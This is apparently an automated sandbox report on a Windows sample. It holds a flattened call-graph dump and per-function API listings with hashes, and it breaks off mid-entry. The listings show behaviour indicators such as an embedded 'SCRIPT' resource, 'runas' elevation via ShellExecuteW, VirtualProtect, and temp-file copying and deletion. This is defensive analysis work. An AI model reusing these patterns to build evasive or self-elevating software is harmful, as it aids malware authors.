96802->97042 96804 dc7201 96805 dbd4ce 4 API calls 96804->96805 96806 dc720b 96805->96806 96807 d57510 53 API calls 96806->96807 96811 dc7239 96806->96811 96808 dc7229 96807->96808 97096 dc2947 96808->97096 96810 d54f39 68 API calls 96810->96754 96811->96810 96813 d57510 53 API calls 96812->96813 96814 dcf126 96813->96814 97163 d59e90 96814->97163 96816 dcf136 96817 dcf15b 96816->96817 96818 d5ec40 235 API calls 96816->96818 96820 dcf15f 96817->96820 97191 d59c6e 22 API calls 96817->97191 96818->96817 96820->96703 97207 dbdbbe lstrlenW 96821->97207 96825 dd7f59 120 API calls 96824->96825 96826 dd959b 96825->96826 96826->96703 96848 d5ec76 messages 96827->96848 96828 d700a3 29 API calls pre_c_initialization 96828->96848 96829 d6fddb 22 API calls 96829->96848 96830 d5fef7 96836 d5a8c7 22 API calls 96830->96836 96844 d5ed9d messages 96830->96844 96833 da4600 96839 d5a8c7 22 API calls 96833->96839 96833->96844 96834 da4b0b 97215 dc359c 82 API calls __wsopen_s 96834->97215 96835 d5a8c7 22 API calls 96835->96848 96836->96844 96839->96844 96841 d70242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96841->96848 96842 d5fbe3 96842->96844 96845 da4bdc 96842->96845 96850 d5f3ae messages 96842->96850 96843 d5a961 22 API calls 96843->96848 96844->96679 97216 dc359c 82 API calls __wsopen_s 96845->97216 96847 da4beb 97217 dc359c 82 API calls __wsopen_s 96847->97217 96848->96828 96848->96829 96848->96830 96848->96833 96848->96834 96848->96835 96848->96841 96848->96842 96848->96843 96848->96844 96848->96847 96849 d701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96848->96849 96848->96850 97212 d601e0 235 API calls 2 library calls 96848->97212 97213 d606a0 41 API calls messages 96848->97213 96849->96848 96850->96844 97214 dc359c 82 API calls __wsopen_s 96850->97214 96851->96702 96852->96664 96853->96667 96854->96677 96855->96683 96856->96683 96857->96665 96858->96703 96859->96703 
96860->96703 96861->96700 96862->96703 96863->96724 96864->96723 96865->96725 96866->96728 96905 d57510 96867->96905 96871 dd8281 96872 dd844f 96871->96872 96877 dd828f 96871->96877 96969 dd8ee4 60 API calls 96872->96969 96875 dd845e 96876 dd846a 96875->96876 96875->96877 96884 dd7fd5 messages 96876->96884 96941 dd7e86 96877->96941 96878 d57510 53 API calls 96889 dd8049 96878->96889 96883 dd82c8 96956 d6fc70 96883->96956 96884->96731 96887 dd82e8 96962 dc359c 82 API calls __wsopen_s 96887->96962 96888 dd8302 96963 d563eb 22 API calls 96888->96963 96889->96871 96889->96878 96889->96884 96960 db417d 22 API calls __fread_nolock 96889->96960 96961 dd851d 42 API calls _strftime 96889->96961 96892 dd82f3 GetCurrentProcess TerminateProcess 96892->96888 96893 dd8311 96964 d56a50 22 API calls 96893->96964 96895 dd832a 96903 dd8352 96895->96903 96965 d604f0 22 API calls 96895->96965 96897 dd84c5 96897->96884 96901 dd84d9 FreeLibrary 96897->96901 96898 dd8341 96966 dd8b7b 75 API calls 96898->96966 96901->96884 96903->96897 96967 d604f0 22 API calls 96903->96967 96968 d5aceb 23 API calls messages 96903->96968 96970 dd8b7b 75 API calls 96903->96970 96906 d57525 96905->96906 96923 d57522 96905->96923 96907 d5752d 96906->96907 96908 d5755b 96906->96908 96971 d751c6 26 API calls 96907->96971 96910 d950f6 96908->96910 96913 d5756d 96908->96913 96918 d9500f 96908->96918 96974 d75183 26 API calls 96910->96974 96911 d5753d 96917 d6fddb 22 API calls 96911->96917 96972 d6fb21 51 API calls 96913->96972 96914 d9510e 96914->96914 96919 d57547 96917->96919 96920 d95088 96918->96920 96922 d6fe0b 22 API calls 96918->96922 96921 d59cb3 22 API calls 96919->96921 96973 d6fb21 51 API calls 96920->96973 96921->96923 96924 d95058 96922->96924 96923->96884 96928 dd8cd3 96923->96928 96925 d6fddb 22 API calls 96924->96925 96926 d9507f 96925->96926 96927 d59cb3 22 API calls 96926->96927 96927->96920 96929 d5aec9 22 API calls 96928->96929 96930 dd8cee CharLowerBuffW 96929->96930 96975 db8e54 
96930->96975 96934 d5a961 22 API calls 96935 dd8d2a 96934->96935 96982 d56d25 96935->96982 96937 dd8d3e 96938 d593b2 22 API calls 96937->96938 96940 dd8d48 _wcslen 96938->96940 96939 dd8e5e _wcslen 96939->96889 96940->96939 96995 dd851d 42 API calls _strftime 96940->96995 96942 dd7ea1 96941->96942 96946 dd7eec 96941->96946 96943 d6fe0b 22 API calls 96942->96943 96944 dd7ec3 96943->96944 96945 d6fddb 22 API calls 96944->96945 96944->96946 96945->96944 96947 dd9096 96946->96947 96948 dd92ab messages 96947->96948 96954 dd90ba _strcat _wcslen 96947->96954 96948->96883 96949 d5b567 39 API calls 96949->96954 96950 d5b6b5 39 API calls 96950->96954 96951 d5b38f 39 API calls 96951->96954 96952 d57510 53 API calls 96952->96954 96953 d7ea0c 21 API calls ___std_exception_copy 96953->96954 96954->96948 96954->96949 96954->96950 96954->96951 96954->96952 96954->96953 96999 dbefae 24 API calls _wcslen 96954->96999 96958 d6fc85 96956->96958 96957 d6fd1d VirtualProtect 96959 d6fceb 96957->96959 96958->96957 96958->96959 96959->96887 96959->96888 96960->96889 96961->96889 96962->96892 96963->96893 96964->96895 96965->96898 96966->96903 96967->96903 96968->96903 96969->96875 96970->96903 96971->96911 96972->96911 96973->96910 96974->96914 96976 db8e74 _wcslen 96975->96976 96977 db8f63 96976->96977 96979 db8ea9 96976->96979 96981 db8f68 96976->96981 96977->96934 96977->96940 96979->96977 96996 d6ce60 41 API calls 96979->96996 96981->96977 96997 d6ce60 41 API calls 96981->96997 96983 d56d34 96982->96983 96984 d56d91 96982->96984 96983->96984 96986 d56d3f 96983->96986 96985 d593b2 22 API calls 96984->96985 96992 d56d62 __fread_nolock 96985->96992 96987 d94c9d 96986->96987 96988 d56d5a 96986->96988 96989 d6fddb 22 API calls 96987->96989 96998 d56f34 22 API calls 96988->96998 96991 d94ca7 96989->96991 96993 d6fe0b 22 API calls 96991->96993 96992->96937 96994 d94cda 96993->96994 96995->96939 96996->96979 96997->96981 96998->96992 96999->96954 97001 d5a961 22 API calls 97000->97001 97002 
d55275 97001->97002 97003 d5a961 22 API calls 97002->97003 97004 d5527d 97003->97004 97005 d5a961 22 API calls 97004->97005 97006 d55285 97005->97006 97007 d5a961 22 API calls 97006->97007 97008 d5528d 97007->97008 97009 d552c1 97008->97009 97010 d93df5 97008->97010 97011 d56d25 22 API calls 97009->97011 97012 d5a8c7 22 API calls 97010->97012 97013 d552cf 97011->97013 97014 d93dfe 97012->97014 97015 d593b2 22 API calls 97013->97015 97016 d5a6c3 22 API calls 97014->97016 97017 d552d9 97015->97017 97018 d55304 97016->97018 97017->97018 97019 d56d25 22 API calls 97017->97019 97020 d55349 97018->97020 97021 d55325 97018->97021 97030 d93e20 97018->97030 97023 d552fa 97019->97023 97022 d56d25 22 API calls 97020->97022 97021->97020 97026 d54c6d 22 API calls 97021->97026 97024 d5535a 97022->97024 97025 d593b2 22 API calls 97023->97025 97027 d55370 97024->97027 97033 d5a8c7 22 API calls 97024->97033 97025->97018 97028 d55332 97026->97028 97031 d55384 97027->97031 97035 d5a8c7 22 API calls 97027->97035 97028->97020 97034 d56d25 22 API calls 97028->97034 97029 d56b57 22 API calls 97037 d93ee0 97029->97037 97030->97029 97032 d5538f 97031->97032 97036 d5a8c7 22 API calls 97031->97036 97038 d5a8c7 22 API calls 97032->97038 97040 d5539a 97032->97040 97033->97027 97034->97020 97035->97031 97036->97032 97037->97020 97039 d54c6d 22 API calls 97037->97039 97154 d549bd 22 API calls __fread_nolock 97037->97154 97038->97040 97039->97037 97040->96782 97043 dbd7d8 97042->97043 97044 dbd7dd 97043->97044 97045 dbd7f3 97043->97045 97047 dbd7ee 97044->97047 97049 d5a8c7 22 API calls 97044->97049 97046 d5a961 22 API calls 97045->97046 97048 dbd7fb 97046->97048 97047->96804 97050 d5a961 22 API calls 97048->97050 97049->97047 97051 dbd803 97050->97051 97052 d5a961 22 API calls 97051->97052 97053 dbd80e 97052->97053 97054 d5a961 22 API calls 97053->97054 97055 dbd816 97054->97055 97056 d5a961 22 API calls 97055->97056 97057 dbd81e 97056->97057 97058 d5a961 22 API calls 97057->97058 97059 dbd826 
97058->97059 97060 d5a961 22 API calls 97059->97060 97061 dbd82e 97060->97061 97062 d5a961 22 API calls 97061->97062 97063 dbd836 97062->97063 97064 d5525f 22 API calls 97063->97064 97065 dbd84d 97064->97065 97066 d5525f 22 API calls 97065->97066 97067 dbd866 97066->97067 97068 d54c6d 22 API calls 97067->97068 97069 dbd872 97068->97069 97070 dbd885 97069->97070 97071 d593b2 22 API calls 97069->97071 97072 d54c6d 22 API calls 97070->97072 97071->97070 97073 dbd88e 97072->97073 97074 dbd89e 97073->97074 97076 d593b2 22 API calls 97073->97076 97075 dbd8b0 97074->97075 97077 d5a8c7 22 API calls 97074->97077 97078 d56350 22 API calls 97075->97078 97076->97074 97077->97075 97079 dbd8bb 97078->97079 97155 dbd978 22 API calls 97079->97155 97081 dbd8ca 97156 dbd978 22 API calls 97081->97156 97083 dbd8dd 97084 d54c6d 22 API calls 97083->97084 97085 dbd8e7 97084->97085 97086 dbd8fe 97085->97086 97087 dbd8ec 97085->97087 97089 d54c6d 22 API calls 97086->97089 97088 d533c6 22 API calls 97087->97088 97091 dbd8f9 97088->97091 97090 dbd907 97089->97090 97092 dbd925 97090->97092 97093 d533c6 22 API calls 97090->97093 97094 d56350 22 API calls 97091->97094 97095 d56350 22 API calls 97092->97095 97093->97091 97094->97092 97095->97047 97097 dc2954 __wsopen_s 97096->97097 97098 d6fe0b 22 API calls 97097->97098 97099 dc2971 97098->97099 97100 d55722 22 API calls 97099->97100 97101 dc297b 97100->97101 97102 dc274e 27 API calls 97101->97102 97103 dc2986 97102->97103 97104 d5511f 64 API calls 97103->97104 97105 dc299b 97104->97105 97106 dc2a6c 97105->97106 97107 dc29bf 97105->97107 97108 dc2e66 75 API calls 97106->97108 97109 dc2e66 75 API calls 97107->97109 97124 dc2a38 97108->97124 97110 dc29c4 97109->97110 97116 dc2a75 messages 97110->97116 97161 d7d583 26 API calls 97110->97161 97112 d550f5 40 API calls 97113 dc2a91 97112->97113 97114 d550f5 40 API calls 97113->97114 97115 dc2aa1 97114->97115 97118 d550f5 40 API calls 97115->97118 97116->96811 97117 dc29ed 97162 d7d583 26 API calls 
97117->97162 97120 dc2abc 97118->97120 97121 d550f5 40 API calls 97120->97121 97122 dc2acc 97121->97122 97123 d550f5 40 API calls 97122->97123 97125 dc2ae7 97123->97125 97124->97112 97124->97116 97126 d550f5 40 API calls 97125->97126 97127 dc2af7 97126->97127 97128 d550f5 40 API calls 97127->97128 97129 dc2b07 97128->97129 97130 d550f5 40 API calls 97129->97130 97131 dc2b17 97130->97131 97157 dc3017 GetTempPathW GetTempFileNameW 97131->97157 97133 dc2b22 97134 d7e5eb 29 API calls 97133->97134 97136 dc2b33 97134->97136 97135 d7e678 67 API calls 97137 dc2bf8 97135->97137 97136->97116 97138 d550f5 40 API calls 97136->97138 97145 d7dbb3 65 API calls 97136->97145 97147 dc2bed 97136->97147 97139 dc2bfe DeleteFileW 97137->97139 97140 dc2c12 97137->97140 97138->97136 97139->97116 97141 dc2c91 CopyFileW 97140->97141 97146 dc2c18 97140->97146 97142 dc2cb9 DeleteFileW 97141->97142 97143 dc2ca7 DeleteFileW 97141->97143 97158 dc2fd8 CreateFileW 97142->97158 97143->97116 97145->97136 97148 dc22ce 79 API calls 97146->97148 97147->97135 97149 dc2c7c 97148->97149 97149->97142 97150 dc2c80 DeleteFileW 97149->97150 97150->97116 97151->96737 97152->96771 97153->96785 97154->97037 97155->97081 97156->97083 97157->97133 97159 dc2fff SetFileTime CloseHandle 97158->97159 97160 dc3013 97158->97160 97159->97160 97160->97116 97161->97117 97162->97124 97164 d56270 22 API calls 97163->97164 97181 d59eb5 97164->97181 97165 d59fd2 97193 d5a4a1 97165->97193 97167 d59fec 97167->96816 97170 d9f7c4 97205 db96e2 84 API calls __wsopen_s 97170->97205 97171 d9f699 97177 d6fddb 22 API calls 97171->97177 97173 d5a405 97173->97167 97206 db96e2 84 API calls __wsopen_s 97173->97206 97175 d5a6c3 22 API calls 97175->97181 97179 d9f754 97177->97179 97178 d9f7d2 97180 d5a4a1 22 API calls 97178->97180 97183 d6fe0b 22 API calls 97179->97183 97182 d9f7e8 97180->97182 97181->97165 97181->97170 97181->97171 97181->97173 97181->97175 97185 d5a587 22 API calls 97181->97185 97186 d5aec9 22 API calls 97181->97186 97187 
d5a4a1 22 API calls 97181->97187 97188 d5a12c __fread_nolock 97181->97188 97192 d54573 41 API calls _wcslen 97181->97192 97202 d548c8 23 API calls 97181->97202 97203 d549bd 22 API calls __fread_nolock 97181->97203 97204 d5a673 22 API calls 97181->97204 97182->97167 97183->97188 97185->97181 97189 d5a0db CharUpperBuffW 97186->97189 97187->97181 97188->97170 97188->97173 97201 d5a673 22 API calls 97189->97201 97191->96820 97192->97181 97194 d5a52b 97193->97194 97199 d5a4b1 __fread_nolock 97193->97199 97196 d6fe0b 22 API calls 97194->97196 97195 d6fddb 22 API calls 97197 d5a4b8 97195->97197 97196->97199 97198 d6fddb 22 API calls 97197->97198 97200 d5a4d6 97197->97200 97198->97200 97199->97195 97200->97167 97201->97181 97202->97181 97203->97181 97204->97181 97205->97178 97206->97167 97208 dbdbdc GetFileAttributesW 97207->97208 97209 dbd4d5 97207->97209 97208->97209 97210 dbdbe8 FindFirstFileW 97208->97210 97209->96703 97210->97209 97211 dbdbf9 FindClose 97210->97211 97211->97209 97212->96848 97213->96848 97214->96844 97215->96844 97216->96847 97217->96844 97218 d703fb 97219 d70407 CallCatchBlock 97218->97219 97247 d6feb1 97219->97247 97221 d7040e 97222 d70561 97221->97222 97225 d70438 97221->97225 97274 d7083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97222->97274 97224 d70568 97275 d74e52 28 API calls _abort 97224->97275 97236 d70477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97225->97236 97258 d8247d 97225->97258 97227 d7056e 97276 d74e04 28 API calls _abort 97227->97276 97231 d70576 97232 d70457 97235 d704de 97239 d704f3 97235->97239 97238 d704d8 97236->97238 97270 d74e1a 38 API calls 3 library calls 97236->97270 97266 d70959 97238->97266 97271 d70992 GetModuleHandleW 97239->97271 97241 d704fa 97241->97224 97242 d704fe 97241->97242 97243 d70507 97242->97243 97272 d74df5 28 API calls _abort 97242->97272 97273 d70040 13 API calls 2 library calls 97243->97273 97246 d7050f 
97246->97232 97248 d6feba 97247->97248 97277 d70698 IsProcessorFeaturePresent 97248->97277 97250 d6fec6 97278 d72c94 10 API calls 3 library calls 97250->97278 97252 d6fecb 97253 d6fecf 97252->97253 97279 d82317 97252->97279 97253->97221 97256 d6fee6 97256->97221 97259 d82494 97258->97259 97260 d70a8c _ValidateLocalCookies 5 API calls 97259->97260 97261 d70451 97260->97261 97261->97232 97262 d82421 97261->97262 97265 d82450 97262->97265 97263 d70a8c _ValidateLocalCookies 5 API calls 97264 d82479 97263->97264 97264->97236 97265->97263 97330 d72340 97266->97330 97268 d7096c GetStartupInfoW 97269 d7097f 97268->97269 97269->97235 97270->97238 97271->97241 97272->97243 97273->97246 97274->97224 97275->97227 97276->97231 97277->97250 97278->97252 97283 d8d1f6 97279->97283 97282 d72cbd 8 API calls 3 library calls 97282->97253 97286 d8d213 97283->97286 97287 d8d20f 97283->97287 97284 d70a8c _ValidateLocalCookies 5 API calls 97285 d6fed8 97284->97285 97285->97256 97285->97282 97286->97287 97289 d84bfb 97286->97289 97287->97284 97290 d84c07 CallCatchBlock 97289->97290 97301 d82f5e EnterCriticalSection 97290->97301 97292 d84c0e 97302 d850af 97292->97302 97294 d84c1d 97300 d84c2c 97294->97300 97315 d84a8f 29 API calls 97294->97315 97297 d84c27 97316 d84b45 GetStdHandle GetFileType 97297->97316 97298 d84c3d __wsopen_s 97298->97286 97317 d84c48 LeaveCriticalSection _abort 97300->97317 97301->97292 97303 d850bb CallCatchBlock 97302->97303 97304 d850c8 97303->97304 97305 d850df 97303->97305 97326 d7f2d9 20 API calls __dosmaperr 97304->97326 97318 d82f5e EnterCriticalSection 97305->97318 97308 d850cd 97327 d827ec 26 API calls __wsopen_s 97308->97327 97310 d850d7 __wsopen_s 97310->97294 97312 d850eb 97314 d85117 97312->97314 97319 d85000 97312->97319 97328 d8513e LeaveCriticalSection _abort 97314->97328 97315->97297 97316->97300 97317->97298 97318->97312 97320 d84c7d __dosmaperr 20 API calls 97319->97320 97321 d85012 97320->97321 97325 d8501f 97321->97325 97329 d83405 11 API calls 2 

Control-flow Graph for d542de (graph not reproduced)
APIs
• GetVersionExW.KERNEL32(?), ref: 00D5430D
  • Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A
• GetCurrentProcess.KERNEL32(?,00DECB64,00000000,?,?), ref: 00D54422
• IsWow64Process.KERNEL32(00000000,?,?), ref: 00D54429
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00D54454
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00D54466
• GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00D54474
• FreeLibrary.KERNEL32(00000000,?,?), ref: 00D5447B
• GetSystemInfo.KERNEL32(?,?,?), ref: 00D544A0
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$kernel32.dll$|O
• API String ID: 3290436268-3101561225
• Opcode ID: ab2b58895554441e73960188c610eeaa78de622be22f5e9abd2e0ffe8a097e64
• Instruction ID: 65fa26d31a7dfbec333d4f55964564686a33030b8b4c98edb16cf0350855f22f
• Opcode Fuzzy Hash: ab2b58895554441e73960188c610eeaa78de622be22f5e9abd2e0ffe8a097e64
• Instruction Fuzzy Hash: 19A1936291A3C0DFCF31CB6B7C851957FE66B76305B0A54E9D881B7A21D260474ECB32

Control-flow Graph for d542a2 (graph not reproduced)
APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00D550AA,?,?,00000000,00000000), ref: 00D542B2
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00D550AA,?,?,00000000,00000000), ref: 00D542C9
• LoadResource.KERNEL32(?,00000000,?,?,00D550AA,?,?,00000000,00000000,?,?,?,?,?,?,00D54F20), ref: 00D935BE
• SizeofResource.KERNEL32(?,00000000,?,?,00D550AA,?,?,00000000,00000000,?,?,?,?,?,?,00D54F20), ref: 00D935D3
• LockResource.KERNEL32(00D550AA,?,?,00D550AA,?,?,00000000,00000000,?,?,?,?,?,?,00D54F20,?), ref: 00D935E6
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: SCRIPT
• API String ID: 3051347437-3967369404
• Opcode ID: d4095d443dc466c00430a6d3e479477fb60c61d673de92cec9c1cdc6eb14b7c0
• Instruction ID: 0521fb628118ff2c1ad0601c37057359c0d45999e93f24e77fa1b643c752c851
• Opcode Fuzzy Hash: d4095d443dc466c00430a6d3e479477fb60c61d673de92cec9c1cdc6eb14b7c0
• Instruction Fuzzy Hash: E211AC70201301BFDB219B65DC88F277BB9EBC5B56F144169B902CA250DB71D8068631

Control-flow Graph (graph not reproduced)
APIs
• SetCurrentDirectoryW.KERNEL32(?), ref: 00D52B6B
  • Part of subcall function 00D53A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E21418,?,00D52E7F,?,?,?,00000000), ref: 00D53A78
  • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
• GetForegroundWindow.USER32(runas,?,?,?,?,?,00E12224), ref: 00D92C10
• ShellExecuteW.SHELL32(00000000,?,?,00E12224), ref: 00D92C17
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
• String ID: runas
• API String ID: 448630720-4000483414
• Opcode ID: 7984f85fd607de373ae74d1d53d7ce87a7ccf5f6f0aacb9cf509d699cfb370e1
• Instruction ID: 9ae20a3e24550b563274ddbf661320aa164bfe2c2ccf112f1d0f891ad759e0e2
• Opcode Fuzzy Hash: 7984f85fd607de373ae74d1d53d7ce87a7ccf5f6f0aacb9cf509d699cfb370e1
• Instruction Fuzzy Hash: 4311A531204345AACF14FF64D8929BEBBA5DFE5342F48142DBC96560A2DF209A4EC732
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,00D95222), ref: 00DBDBCE
                                                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00DBDBDD
                                                                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 00DBDBEE
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00DBDBFA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2695905019-0
                                                                                                            • Opcode ID: 1baa4367c4f330d4f170c36ffaf0c49244d4c8df83fd5bfce135cd71483bec3c
                                                                                                            • Instruction ID: add521370ba934f8851242a2742acdfdd3385695d58108b1238a6ec521d3ab99
                                                                                                            • Opcode Fuzzy Hash: 1baa4367c4f330d4f170c36ffaf0c49244d4c8df83fd5bfce135cd71483bec3c
                                                                                                            • Instruction Fuzzy Hash: E8F0A73082061097C2207B789C4E4AA3B7D9E05334B144706F976C11E0FBB05D5585B9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BuffCharUpper
                                                                                                            • String ID: p#
                                                                                                            • API String ID: 3964851224-4182048217
                                                                                                            • Opcode ID: c37688a0274b249f90205ba0ea4f986bee830acdf9b9cafc294ee6e3fc0dc23b
                                                                                                            • Instruction ID: 457e6d824d09a3c3e6a2e6d08afd70bcccab43829aa395938f192160541d2452
                                                                                                            • Opcode Fuzzy Hash: c37688a0274b249f90205ba0ea4f986bee830acdf9b9cafc294ee6e3fc0dc23b
                                                                                                            • Instruction Fuzzy Hash: 6CA23A706183019FDB14DF18C480B2ABBE1FF89305F18995DED999B252D771E849CFA2
                                                                                                            APIs
                                                                                                            • GetInputState.USER32 ref: 00D5D807
                                                                                                            • timeGetTime.WINMM ref: 00D5DA07
                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D5DB28
                                                                                                            • TranslateMessage.USER32(?), ref: 00D5DB7B
                                                                                                            • DispatchMessageW.USER32(?), ref: 00D5DB89
                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D5DB9F
                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00D5DBB1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                            • String ID:
                                                                                                            • API String ID: 2189390790-0
                                                                                                            • Opcode ID: 2530073c91bab1d3236a4375dad7b31de518cb1d6401bad7fa600b2d866f41ed
                                                                                                            • Instruction ID: 96d0820e80b99fb3d7dbf17c34787495d1dbca15a68e3165cf217804087fdc7b
                                                                                                            • Opcode Fuzzy Hash: 2530073c91bab1d3236a4375dad7b31de518cb1d6401bad7fa600b2d866f41ed
                                                                                                            • Instruction Fuzzy Hash: 6542BE706083419FDB38DF25C884BAAB7A2FF56315F184559EC96872A1D770E848CFB2

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00D52D07
                                                                                                            • RegisterClassExW.USER32(00000030), ref: 00D52D31
                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D52D42
                                                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00D52D5F
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D52D6F
                                                                                                            • LoadIconW.USER32(000000A9), ref: 00D52D85
                                                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D52D94
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
